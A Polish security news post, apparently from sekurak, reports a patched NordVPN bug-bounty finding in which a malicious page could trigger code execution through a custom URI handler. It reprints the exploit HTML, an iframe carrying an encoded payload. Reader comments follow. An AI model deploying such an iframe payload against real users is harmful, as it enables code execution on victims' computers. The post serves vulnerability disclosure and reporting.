Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Sprawdź VPS od Aruba!

Aruba

NordVPN – wykonanie kodu na komputerze ofiary. Wystarczyło wejść na zainfekowaną stronę i w popupie potwierdzić: „Open NordVPN”

26 stycznia 2021, 22:33 | W biegu | komentarzy 10

Ciekawa podatność zgłoszona w ramach programu bug bounty. Badacz odkrył ze wystarczyło na jakiejś stronie zamieścić takiego iframe:

<!– exploit.html –> <!DOCTYPE html> <html lang=”en”> <head> <meta charset=”UTF-8″> <meta name=”viewport” content=”width=device-width, initial-scale=1.0″> <title>Exploit</title> </head> <body> <iframe src=”NordVPN.Notification:UAAAAB+LCAAAAAAABAANy0EKgCAQBdC7/LV0AHdC0K5WHWAQi4FpFB2hkO5eb/8Glpp7gQcc1mx8cCTjrEFJHuPYZjKC1y7iEOrZr6TW4Ae2knSv8tdIEqd0J7zvBy7afohQAAAA”></iframe> </body> </html>

Jeśli ofiara weszła na stronę, miała prezentowane dość niewinne okno z prośbą o potwierdzenie akcji 'Open NordVPN’. Jeśli ta opcja została wybrana następowało wykonanie ustalonego przez atakującego kodu:

Podatność została załatana, a badaczowi przyznano (naszym zdaniem) dość skromną nagrodę $500.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Userka
    26 stycznia, 2021 | 11:01 pm

    NordVPN można uruchomić sobie w kliencie na routerze, co ma swoje zalety jak i wady. Wtedy cały ruch leci przez VPN i nie potrzebujemy aplikacji.

    Odpowiedz
    • Mateusz
      26 stycznia, 2021 | 11:53 pm

      A wady to jakie ?

      Odpowiedz
      • PanAnonimowy
        28 stycznia, 2021 | 8:19 am

        Blokada przez wiele serwisów w dostępie do usługi, m. in. Netflix, Hbo

        Odpowiedz
  2. Paweł
    26 stycznia, 2021 | 11:51 pm

    Nie musi iść cały, może wybrany…

    Odpowiedz
  3. Odmiana przez przypadki
    27 stycznia, 2021 | 12:07 am

    Cześć! Bardzo cenię Wasze artykuły, ale jednej rzeczy nie zdzierżam! ;-(

    Błędnej formy biernika.

    Nie mówi się „zamieścić takiego iframe”, tylko „zamieścić taki iframe”. Bo tu musi być biernik, nie dopełniacz.

    Zamieścić kogo? co? – np: taki iframe, naukowy artykuł, drobne ogłoszenie, artystyczny portret.

    Żle: „zamieścić takiego iframe; „zamieścić naukowego artykuła”; „zamieścić drobnego ogłoszenia”; „zamieścić artystycznego portreta”.

    Odpowiedz
    • Krzysiek
      29 stycznia, 2021 | 6:24 pm

      „Zamieścić takiego iframe’a.”

      Odpowiedz
      • Odmiana przez przypadki
        30 stycznia, 2021 | 2:28 am

        Tę (błędną) formę zacytowałem z artykułu: „zamieścić takiego iframe”.

        Odpowiedz
  4. Janek
    27 stycznia, 2021 | 12:57 am

    A jakie ma wady ?

    Odpowiedz
  5. Adam
    27 stycznia, 2021 | 2:07 am

    Nordvpn wywodzi się z firmy, która miała darmowego vpna sprzedającego dane swoich użytkowników. Fajnie całe „śledztwo” opowiadał pewien Pan z konkurencyjnej stronie o bezpieczeństwie kilka miesięcy na webinarze. 500$ to żart za taką podatność i raczej nie pokazuje jak dbają o bezpieczeństwo swoich klientów :/

    Odpowiedz
  6. Death121
    27 stycznia, 2021 | 9:12 am

    Śmiech w języku openvpn.

    Odpowiedz

Odpowiedz